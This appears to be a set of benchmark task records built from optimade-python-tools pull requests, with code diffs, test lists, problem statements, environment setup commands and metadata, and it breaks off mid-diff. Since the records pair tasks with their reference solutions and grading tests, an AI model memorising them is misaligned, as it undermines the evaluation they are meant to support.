a/tests/filterparser/testfiles/parse_008.inp b/tests/filterparser/testfiles/parse_008.inp deleted file mode 100644 index 3090fa4a..00000000 --- a/tests/filterparser/testfiles/parse_008.inp +++ /dev/null @@ -1,1 +0,0 @@ - filter=key=value diff --git a/tests/filterparser/testfiles/parse_009.inp b/tests/filterparser/testfiles/parse_009.inp deleted file mode 100644 index bb24c9e6..00000000 --- a/tests/filterparser/testfiles/parse_009.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=author=" someone " diff --git a/tests/filterparser/testfiles/parse_010.inp b/tests/filterparser/testfiles/parse_010.inp deleted file mode 100644 index 1062b45a..00000000 --- a/tests/filterparser/testfiles/parse_010.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=NOTICE=val diff --git a/tests/filterparser/testfiles/parse_011.inp b/tests/filterparser/testfiles/parse_011.inp deleted file mode 100644 index c5b2c164..00000000 --- a/tests/filterparser/testfiles/parse_011.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=author="Sąžininga Žąsis" diff --git a/tests/filterparser/testfiles/parse_012.inp b/tests/filterparser/testfiles/parse_012.inp deleted file mode 100644 index 39143f62..00000000 --- a/tests/filterparser/testfiles/parse_012.inp +++ /dev/null @@ -1,2 +0,0 @@ -filter=author="Sąžininga Žąs -is" diff --git a/tests/filterparser/testfiles/parse_013.inp b/tests/filterparser/testfiles/parse_013.inp deleted file mode 100644 index a183d6b6..00000000 --- a/tests/filterparser/testfiles/parse_013.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter= a = 12345 AND b = +12 AND c = -34 AND d = 1.2 AND e = .2E7 AND f = -.2E+7 AND g = +10.01E-10 AND h = 6.03e23 AND i = .1E1 AND j = -.1e1 AND k = 1.e-12 AND l = -.1e-12 AND m = 1000000000.E1000000000 diff --git a/tests/filterparser/testfiles/parse_014.inp b/tests/filterparser/testfiles/parse_014.inp deleted file mode 100644 index 8019cd61..00000000 --- a/tests/filterparser/testfiles/parse_014.inp +++ /dev/null @@ -1,1 +0,0 @@ -filter=field = "!#$%&'()*+,-./:;<=>?@[]^`{|}~%" diff --git a/tests/filtertransformers/test_elasticsearch.py b/tests/filtertransformers/test_elasticsearch.py index bf72b729..b39618ee 100644 --- a/tests/filtertransformers/test_elasticsearch.py +++ b/tests/filtertransformers/test_elasticsearch.py @@ -13,7 +13,7 @@ from optimade.filtertransformers.elasticsearch import ( @pytest.fixture def parser(): - return LarkParser(version=(0, 10, 1)) + return LarkParser() @pytest.fixture
[ "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_repr", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_parser_version", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_empty", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_property_names", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_string_values", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_number_values", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_operators", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_id", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_string_operations", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_list_properties", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_properties", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_precedence", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_special_cases", "tests/filterparser/test_filterparser.py::TestParserV1_2_0::test_boolean_values" ]
[ "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_repr", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_parser_version", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_empty", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_property_names", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_string_values", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_number_values", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_operators", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_id", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_string_operations", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_list_properties", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_properties", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_precedence", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_special_cases" ]
Method: LarkParser.__init__(self, version: Tuple[int, int, int] = None, variant: str = "default") Location: optimade/filterparser/lark_parser.py Inputs: - **version** (optional Tuple[int, int, int]): Desired grammar version; if omitted or None, the parser automatically selects the highest grammar version marked as default in the internal AVAILABLE_PARSERS mapping. - **variant** (optional str, default "default"): Name of the grammar variant to use (e.g., "default", "develop"). Outputs: - Constructs a `LarkParser` instance with attributes `self.version` set to the resolved version tuple and `self.variant` set to the supplied variant. - Raises `ParserError` if the resolved version is not present in `AVAILABLE_PARSERS`. Description: Initializes the filter parser, now allowing callers to omit the `version` argument and automatically obtain the latest default grammar. The `variant` argument remains optional and selects a specific grammar variant. This change is exercised in tests where `LarkParser()` is instantiated without arguments and its `version` and `variant` attributes are inspected.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/filterparser/test_filterparser.py tests/filtertransformers/test_elasticsearch.py" }
{ "num_modified_files": 3, "num_modified_lines": 27, "pr_author": "ml-evs", "pr_labels": [ "grammar: Concerns the Lark grammar files", "priority/low: Issue or PR with a consensus of low priority", "tests: Related to tests" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.95, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat", "dev_ops_enh" ], "reason": null, "reasoning": "The issue requests removal of obsolete grammars, addition of a v1.2 development grammar with TRUE/FALSE tokens, and consolidation of tests so newer grammars inherit previous tests. The provided test patch implements exactly these changes: it deletes old test files, introduces a base test class, updates existing tests, and adds boolean-specific tests for the new grammar. There are no mismatches between the tests and the described requirements, nor any signs of hidden dependencies, naming expectations, external resources, or ambiguous specifications, so the task is clearly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
b5169a88b9f8faa86e2c9c585ed058424405603f
2022-12-06 23:35:34
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1428?src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report > Merging [#1428](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1428?src=pr&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (4c18c23) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/a8c84c5f193e668eb8b5fc3f0db1d6a63796f472?el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (a8c84c5) will **not change** coverage. > The diff coverage is `100.00%`. ```diff @@ Coverage Diff @@ ## master #1428 +/- ## ======================================= Coverage 91.43% 91.43% ======================================= Files 74 74 Lines 4392 4392 ======================================= Hits 4016 4016 Misses 376 376 ``` | Flag | Coverage Δ | | |---|---|---| | project | `91.43% <100.00%> (ø)` | | | validator | `91.53% <100.00%> (ø)` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1428?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [optimade/models/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1428/diff?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvbW9kZWxzL3V0aWxzLnB5) | `92.78% <100.00%> (ø)` | | Help us with your feedback. Take ten seconds to tell us [how you rate us](https://about.codecov.io/nps?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). Have a feature suggestion? [Share it here.](https://app.codecov.io/gh/feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia)
materials-consortia__optimade-python-tools-1428
diff --git a/openapi/openapi.json b/openapi/openapi.json index 918a2965..180dce2b 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -3360,8 +3360,8 @@ }, "description": "If present MUST be a list of floats expressed in a.m.u.\nElements denoting vacancies MUST have masses equal to 0.", "x-optimade-queryable": "optional", - "x-optimade-support": "optional", - "x-optimade-unit": "a.m.u." + "x-optimade-unit": "a.m.u.", + "x-optimade-support": "optional" }, "original_name": { "title": "Original Name", @@ -3579,7 +3579,7 @@ }, "chemical_formula_reduced": { "title": "Chemical Formula Reduced", - "pattern": "^([A-Z][a-z]?([2-9]|[1-9]\\d+)?)+$", + "pattern": "(^$)|^([A-Z][a-z]?([2-9]|[1-9]\\d+)?)+$", "type": "string", "description": "The reduced chemical formula for a structure as a string with element symbols and integer chemical proportion numbers.\nThe proportion number MUST be omitted if it is 1.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property.\n However, support for filters using partial string matching with this property is OPTIONAL (i.e., BEGINS WITH, ENDS WITH, and CONTAINS).\n Intricate queries on formula components are instead suggested to be formulated using set-type filter operators on the multi valued `elements` and `elements_ratios` properties.\n - Element symbols MUST have proper capitalization (e.g., `\"Si\"`, not `\"SI\"` for \"silicon\").\n - Elements MUST be placed in alphabetical order, followed by their integer chemical proportion number.\n - For structures with no partial occupation, the chemical proportion numbers are the smallest integers for which the chemical proportion is exactly correct.\n - For structures with partial occupation, the chemical proportion numbers are integers that within reasonable approximation indicate the correct chemical proportions. The precise details of how to perform the rounding is chosen by the API implementation.\n - No spaces or separators are allowed.\n\n- **Examples**:\n - `\"H2NaO\"`\n - `\"ClNa\"`\n - `\"CCaO3\"`\n\n- **Query examples**:\n - A filter that matches an exactly given formula is `chemical_formula_reduced=\"H2NaO\"`.", "nullable": true, @@ -3588,7 +3588,7 @@ }, "chemical_formula_hill": { "title": "Chemical Formula Hill", - "pattern": "^([A-Z][a-z]?([2-9]|[1-9]\\d+)?)+$", + "pattern": "(^$)|^([A-Z][a-z]?([2-9]|[1-9]\\d+)?)+$", "type": "string", "description": "The chemical formula for a structure in [Hill form](https://dx.doi.org/10.1021/ja02046a005) with element symbols followed by integer chemical proportion numbers. The proportion number MUST be omitted if it is 1.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, only a subset of the filter features MAY be supported.\n - The overall scale factor of the chemical proportions is chosen such that the resulting values are integers that indicate the most chemically relevant unit of which the system is composed.\n For example, if the structure is a repeating unit cell with four hydrogens and four oxygens that represents two hydroperoxide molecules, `chemical_formula_hill` is `\"H2O2\"` (i.e., not `\"HO\"`, nor `\"H4O4\"`).\n - If the chemical insight needed to ascribe a Hill formula to the system is not present, the property MUST be handled as unset.\n - Element symbols MUST have proper capitalization (e.g., `\"Si\"`, not `\"SI\"` for \"silicon\").\n - Elements MUST be placed in [Hill order](https://dx.doi.org/10.1021/ja02046a005), followed by their integer chemical proportion number.\n Hill order means: if carbon is present, it is placed first, and if also present, hydrogen is placed second.\n After that, all other elements are ordered alphabetically.\n If carbon is not present, all elements are ordered alphabetically.\n - If the system has sites with partial occupation and the total occupations of each element do not all sum up to integers, then the Hill formula SHOULD be handled as unset.\n - No spaces or separators are allowed.\n\n- **Examples**:\n - `\"H2O2\"`\n\n- **Query examples**:\n - A filter that matches an exactly given formula is `chemical_formula_hill=\"H2O2\"`.", "x-optimade-queryable": "optional", @@ -3596,7 +3596,7 @@ }, "chemical_formula_anonymous": { "title": "Chemical Formula Anonymous", - "pattern": "^([A-Z][a-z]?([2-9]|[1-9]\\d+)?)+$", + "pattern": "(^$)|^([A-Z][a-z]?([2-9]|[1-9]\\d+)?)+$", "type": "string", "description": "The anonymous formula is the `chemical_formula_reduced`, but where the elements are instead first ordered by their chemical proportion number, and then, in order left to right, replaced by anonymous symbols A, B, C, ..., Z, Aa, Ba, ..., Za, Ab, Bb, ... and so on.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: MUST be a queryable property.\n However, support for filters using partial string matching with this property is OPTIONAL (i.e., BEGINS WITH, ENDS WITH, and CONTAINS).\n\n- **Examples**:\n - `\"A2B\"`\n - `\"A42B42C16D12E10F9G5\"`\n\n- **Querying**:\n - A filter that matches an exactly given formula is `chemical_formula_anonymous=\"A2B\"`.", "nullable": true, @@ -3640,8 +3640,8 @@ "description": "The three lattice vectors in Cartesian coordinates, in \u00e5ngstr\u00f6m (\u00c5).\n\n- **Type**: list of list of floats or unknown values.\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - MUST be a list of three vectors *a*, *b*, and *c*, where each of the vectors MUST BE a list of the vector's coordinates along the x, y, and z Cartesian coordinates.\n (Therefore, the first index runs over the three lattice vectors and the second index runs over the x, y, z Cartesian coordinates).\n - For databases that do not define an absolute Cartesian system (e.g., only defining the length and angles between vectors), the first lattice vector SHOULD be set along *x* and the second on the *xy*-plane.\n - MUST always contain three vectors of three coordinates each, independently of the elements of property `dimension_types`.\n The vectors SHOULD by convention be chosen so the determinant of the `lattice_vectors` matrix is different from zero.\n The vectors in the non-periodic directions have no significance beyond fulfilling these requirements.\n - The coordinates of the lattice vectors of non-periodic dimensions (i.e., those dimensions for which `dimension_types` is `0`) MAY be given as a list of all `null` values.\n If a lattice vector contains the value `null`, all coordinates of that lattice vector MUST be `null`.\n\n- **Examples**:\n - `[[4.0,0.0,0.0],[0.0,4.0,0.0],[0.0,1.0,4.0]]` represents a cell, where the first vector is `(4, 0, 0)`, i.e., a vector aligned along the `x` axis of length 4 \u00c5; the second vector is `(0, 4, 0)`; and the third vector is `(0, 1, 4)`.", "nullable": true, "x-optimade-queryable": "optional", - "x-optimade-support": "should", - "x-optimade-unit": "\u00c5" + "x-optimade-unit": "\u00c5", + "x-optimade-support": "should" }, "cartesian_site_positions": { "title": "Cartesian Site Positions", @@ -3657,8 +3657,8 @@ "description": "Cartesian positions of each site in the structure.\nA site is usually used to describe positions of atoms; what atoms can be encountered at a given site is conveyed by the `species_at_sites` property, and the species themselves are described in the `species` property.\n\n- **Type**: list of list of floats\n\n- **Requirements/Conventions**:\n - **Support**: SHOULD be supported by all implementations, i.e., SHOULD NOT be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n If supported, filters MAY support only a subset of comparison operators.\n - It MUST be a list of length equal to the number of sites in the structure, where every element is a list of the three Cartesian coordinates of a site expressed as float values in the unit angstrom (\u00c5).\n - An entry MAY have multiple sites at the same Cartesian position (for a relevant use of this, see e.g., the property `assemblies`).\n\n- **Examples**:\n - `[[0,0,0],[0,0,2]]` indicates a structure with two sites, one sitting at the origin and one along the (positive) *z*-axis, 2 \u00c5 away from the origin.", "nullable": true, "x-optimade-queryable": "optional", - "x-optimade-support": "should", - "x-optimade-unit": "\u00c5" + "x-optimade-unit": "\u00c5", + "x-optimade-support": "should" }, "nsites": { "title": "Nsites", diff --git a/optimade/models/utils.py b/optimade/models/utils.py index 603ef08a..0474cdf9 100644 --- a/optimade/models/utils.py +++ b/optimade/models/utils.py @@ -231,7 +231,7 @@ def anonymous_element_generator(): ANONYMOUS_ELEMENTS = tuple(itertools.islice(anonymous_element_generator(), 150)) """ Returns the first 150 values of the anonymous element generator. """ -CHEMICAL_FORMULA_REGEXP = r"^([A-Z][a-z]?([2-9]|[1-9]\d+)?)+$" +CHEMICAL_FORMULA_REGEXP = r"(^$)|^([A-Z][a-z]?([2-9]|[1-9]\d+)?)+$" EXTRA_SYMBOLS = ["X", "vacancy"]
Allow empty strings through chemical formula regexp Last PR of the day, and one that can actually be reviewed and merged. After discussions in https://github.com/Materials-Consortia/OPTIMADE/issues/388, it seems that empty formulae should be allowed -- though we should wait until it is really resolved to merge this. This PR adjusted the regexp for this and moves the test case around. This has knock-on effects on open PRs in other repos (schemas, specification) that will need to be untangled at a later date.
**Title** Allow empty strings for chemical formula fields **Problem** The chemical formula properties reject empty strings, conflicting with the discussion that an empty formula should be a valid representation of “no formula”. This causes validation errors for legitimate responses. **Root Cause** The validation pattern for formula fields requires at least one element symbol, disallowing the empty string. **Fix / Expected Behavior** - Update the validation pattern to accept an empty string as a valid value. - Apply the same relaxed pattern to all three formula representations (reduced, Hill, anonymous). - Keep existing non‑empty formula strings validated against the original element‑symbol pattern. - Preserve nullability and other schema constraints unchanged. - Ensure the OpenAPI description reflects the updated pattern. **Risk & Validation** - Verify that all previously accepted formula strings still pass validation. - Add tests confirming that an empty string is accepted for each formula field. - Monitor downstream repositories for any schema compatibility issues that may arise.
1,428
Materials-Consortia/optimade-python-tools
diff --git a/tests/models/test_utils.py b/tests/models/test_utils.py index 955ecdee..bfeb3a1b 100644 --- a/tests/models/test_utils.py +++ b/tests/models/test_utils.py @@ -96,6 +96,7 @@ def test_formula_regexp(): "LiP5", "Jn7Qb4", # Regexp does not care about the actual existence of elements "A5B213CeD3E65F12G", + "", ) bad_formulae = ( @@ -106,7 +107,7 @@ def test_formula_regexp(): "6F7G", "A0Be2", "A1Be2", - "", + "A0B1", ) for formula in good_formulae:
[ "tests/models/test_utils.py::test_formula_regexp" ]
[ "tests/models/test_utils.py::test_strict_field", "tests/models/test_utils.py::test_optimade_field", "tests/models/test_utils.py::test_compatible_strict_optimade_field" ]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/models/test_utils.py" }
{ "num_modified_files": 2, "num_modified_lines": 10, "pr_author": "ml-evs", "pr_labels": [ "schema: Concerns the schema models", "models: For issues related to the pydantic models directly" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/Materials-Consortia/OPTIMADE/issues/388" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "edge_case_bug" ], "reason": null, "reasoning": "The issue requests that the chemical formula regular expression accept empty strings, moving '' into the set of valid formulas and treating \"A0B1\" as invalid. The provided test changes reflect exactly this requirement, and the code change updates CHEMICAL_FORMULA_REGEXP accordingly. No mismatches between test expectations and the stated goal are present, and there are no signals of missing specifications or external dependencies, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
7c8f9a63ff169fd1e1c90676e304ca9c99e5b939
2023-02-09 19:55:56
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report > Merging [#1509](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (57f5675) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/7c8f9a63ff169fd1e1c90676e304ca9c99e5b939?el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) (7c8f9a6) will **increase** coverage by `0.01%`. > The diff coverage is `92.30%`. ```diff @@ Coverage Diff @@ ## master #1509 +/- ## ========================================== + Coverage 90.95% 90.97% +0.01% ========================================== Files 74 74 Lines 4411 4464 +53 ========================================== + Hits 4012 4061 +49 - Misses 399 403 +4 ``` | Flag | Coverage Δ | | |---|---|---| | project | `90.97% <92.30%> (+0.01%)` | :arrow_up: | | validator | `90.32% <92.30%> (+0.02%)` | :arrow_up: | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [optimade/adapters/base.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvYWRhcHRlcnMvYmFzZS5weQ==) | `96.96% <83.33%> (-3.04%)` | :arrow_down: | | [optimade/models/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvbW9kZWxzL3V0aWxzLnB5) | `92.50% <91.66%> (-0.29%)` | :arrow_down: | | [optimade/adapters/structures/ase.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9hc2UucHk=) | `96.77% <92.59%> (-3.23%)` | :arrow_down: | | [optimade/adapters/structures/adapter.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9hZGFwdGVyLnB5) | `100.00% <100.00%> (ø)` | | | [optimade/adapters/structures/pymatgen.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy9weW1hdGdlbi5weQ==) | `98.50% <100.00%> (-0.16%)` | :arrow_down: | | [optimade/adapters/structures/utils.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvYWRhcHRlcnMvc3RydWN0dXJlcy91dGlscy5weQ==) | `80.74% <100.00%> (+0.74%)` | :arrow_up: | | [optimade/models/structures.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/1509?src=pr&el=tree&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#diff-b3B0aW1hZGUvbW9kZWxzL3N0cnVjdHVyZXMucHk=) | `96.42% <100.00%> (+0.67%)` | :arrow_up: | Help us with your feedback. Take ten seconds to tell us [how you rate us](https://about.codecov.io/nps?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). Have a feature suggestion? [Share it here.](https://app.codecov.io/gh/feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) ml-evs: Hi @JPBergsma, will merge this tomorrow, let me know if you want to have a second look first and I'll hold off.
materials-consortia__optimade-python-tools-1509
diff --git a/README.md b/README.md index 3dea2fe7..7183842d 100644 --- a/README.md +++ b/README.md @@ -4,10 +4,7 @@ <img width="100px" align="center" src="https://matsci.org/uploads/default/original/2X/b/bd2f59b3bf14fb046b74538750699d7da4c19ac1.svg"> </div> -<h1 align="center"> -OPTIMADE Python tools -</h1> - +# <div align="center">OPTIMADE Python tools</div> <div align="center"> @@ -50,6 +47,7 @@ This is to enable interoperability among databases that serve crystal structures This repository contains a library of tools for implementing and consuming [OPTIMADE APIs](https://www.optimade.org) using Python: 1. [pydantic](https://github.com/pydantic/pydantic) data models for all [OPTIMADE entry types](https://www.optimade.org/optimade-python-tools/latest/all_models/) and endpoint responses, and a [Lark](https://github.com/lark-parser/lark) [EBNF grammar](https://en.wikipedia.org/wiki/Extended_Backus%E2%80%93Naur_form) implementation for the OPTIMADE filter language. +1. Adapters to map OPTIMADE data to and from many commonly used atomistic Python frameworks (e.g., [pymatgen](https://pymatgen.org/), [ASE](https://wiki.fysik.dtu.dk/ase/)) and crystallographic file types (e.g., [CIF](https://www.iucr.org/resources/cif)), using the `optimade.adapters` module. 1. A configurable reference server implementation that can make use of either MongoDB or Elasticsearch database backends out-of-the-box, and is readily extensible to other backends. Try it out on the [demo site](https://optimade.fly.dev)! The OpenAPI schemas of the server are used to construct the [OPTIMADE schemas](https://schemas.optimade.org/) site. 1. An [OPTIMADE client](https://www.optimade.org/optimade-python-tools/latest/getting_started/client/) (`optimade-get`) that can query multiple [OPTIMADE providers](https://optimade.org/providers-dashboard) concurrently with a given filter, at the command-line or from Python code. 1. A fuzzy API validator tool, which may be called from the shell (`optimade-validator`) or used as a GitHub Action from [optimade-validator-action](https://github.com/Materials-Consortia/optimade-validator-action); this validator is used to construct the [providers dashboard](https://optimade.org/providers-dashboard). diff --git a/optimade/adapters/base.py b/optimade/adapters/base.py index d0849087..f1d4bcb6 100644 --- a/optimade/adapters/base.py +++ b/optimade/adapters/base.py @@ -34,6 +34,9 @@ class EntryAdapter: Attributes: ENTRY_RESOURCE: Entry resource to store entry as. _type_converters: Dictionary of valid conversion types for entry. + _type_ingesters: Dictionary of valid ingestion types mapped to ingestion functions. + _type_ingesters_by_type: Dictionary mapping the keys of `_type_ingesters` to data + types that can be ingested. as_<_type_converters>: Convert entry to a type listed in `_type_converters`. from_<_type_converters>: Convert an external type to the corresponding OPTIMADE model. @@ -42,6 +45,7 @@ class EntryAdapter: ENTRY_RESOURCE: Type[EntryResource] = EntryResource _type_converters: Dict[str, Callable] = {} _type_ingesters: Dict[str, Callable] = {} + _type_ingesters_by_type: Dict[str, Type] = {} def __init__(self, entry: dict) -> None: """ @@ -116,6 +120,48 @@ class EntryAdapter: return self._converted[format] + @classmethod + def ingest_from(cls, data: Any, format: Optional[str] = None) -> Any: + """Convert desired format to OPTIMADE format. + + Parameters: + data (Any): The data to convert. + format (str): Type or format to which the entry should be converted. + + Raises: + AttributeError: If `format` can not be found in `_type_ingesters`. + + Returns: + The ingested Structure. + + """ + + if format is None: + for key, instance_type in cls._type_ingesters_by_type.items(): + if isinstance(data, instance_type): + format = key + break + + else: + raise AttributeError( + f"Non entry type to data of type {type(data)} from.\n" + f"Valid entry types: {tuple(cls._type_ingesters.keys())}" + ) + + if format not in cls._type_ingesters: + raise AttributeError( + f"Non-valid entry type to ingest from: {format}\n" + f"Valid entry types: {tuple(cls._type_ingesters.keys())}" + ) + 